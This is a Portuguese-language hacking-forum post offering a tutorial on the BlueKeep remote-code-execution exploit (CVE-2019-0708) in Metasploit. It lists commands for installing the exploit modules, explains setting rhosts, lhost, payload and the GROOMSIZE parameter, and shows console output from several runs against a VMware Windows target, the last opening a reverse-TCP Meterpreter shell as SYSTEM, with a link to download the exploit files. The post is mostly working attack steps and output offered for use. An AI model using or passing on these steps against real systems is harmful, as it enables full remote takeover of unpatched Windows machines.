Olá, Visitante!         Registrar

Para obter as tools sem precisar passar pelo registro do forum, visitem nosso blog em https://blog.blackunix.com


Avaliação do Tópico:
  • 0 votos - 0 Média
  • 1
  • 2
  • 3
  • 4
  • 5
[TUTORIAL] Utilizando o Exploit Bluekeep
blackunix  


Owner

Mensagens: 35
Tópicos: 27
Registrado: Setembro 2017
Likes 2
Nível de Aviso:

              

 Creditos: 386,29 ₵
#1
Utilizando o Exploit Bluekeep
bluekeep-exploit

Exploit Bluekeep (CVE 2019-0708)

https://blog.rapid7.com/2019/09/06/initi...2019-0708/

Como usar:

Crie uma pasta chamada rdp (por mera conveniência) em /usr/share/metasploit-framework/modules/exploits/windows/ e cole este arquivo (cve_2019_0708_bluekeep_rce.rb) na pasta (rdp) e use seus skills no metasploit

Também substitua os arquivos nas respectivas pastas abaixo:

rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/

cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb      

rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

cp ./rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb      

cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

cp ./cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/

  cp ./cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

modo de usar: digite no console do msf use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

e use as configurações usuais rhosts,lhost,payload etc

COMO FAZER PARA O EXPLOIT FUNCIONAR:

############################

Você tem que configurar o tamanho do parametro GROOMSIZE como mostrado abaixo com valores diferentes de acordo com o tipo de maquina
que será exploitada, para exemplo usaremos uma maquina rodando em VMWARE(15) com windows e hardware com 2GB de RAM e 1 processador de 1 core

Conclusão que o tamanho do parametro GROOMSIZE em 50 funcionou perfeitamente

############################

 
Código:
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 100
 GROOMSIZE => 100
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

 
[*]Started reverse TCP handler on 192.168.43.84:4444
 
[*]192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
 [+] 192.168.43.137:3389   - The target is vulnerable.
 
[*]192.168.43.137:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa801f000000, Channel count 1.
 
[*]192.168.43.137:3389 - Surfing channels ...
 
[*]192.168.43.137:3389 - Lobbing eggs ...
 
[*]192.168.43.137:3389 - Forcing the USE of FREE'd object ...
 
[*]Exploit completed, but no session was created.
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 150
 GROOMSIZE => 150
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

 
[*]Started reverse TCP handler on 192.168.43.84:4444
 
[*]192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
 [+] 192.168.43.137:3389   - The target is vulnerable.
 
[*]192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1.
 
[*]192.168.43.137:3389 - Surfing channels ...
 
[*]192.168.43.137:3389 - Lobbing eggs ...
 [-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
 
[*]Exploit completed, but no session was created.
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 50
 GROOMSIZE => 50
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

 
[*]Started reverse TCP handler on 192.168.43.84:4444
 
[*]192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
 [+] 192.168.43.137:3389   - The target is vulnerable.
 
[*]192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1.
 
[*]192.168.43.137:3389 - Surfing channels ...
 
[*]192.168.43.137:3389 - Lobbing eggs ...
 
[*]192.168.43.137:3389 - Forcing the USE of FREE'd object ...
 
[*]Sending stage (206403 bytes) to 192.168.43.137
 
[*]Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530

 meterpreter

[*]> getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter >



[*]para baixar o arquivo citado acima visite https://github.com/TinToSer/bluekeep-exploit

20-11-2019 06:29
Procurar Responder


Saltar Fórum:


usuários a ver este tópico: 1 Visitante(s)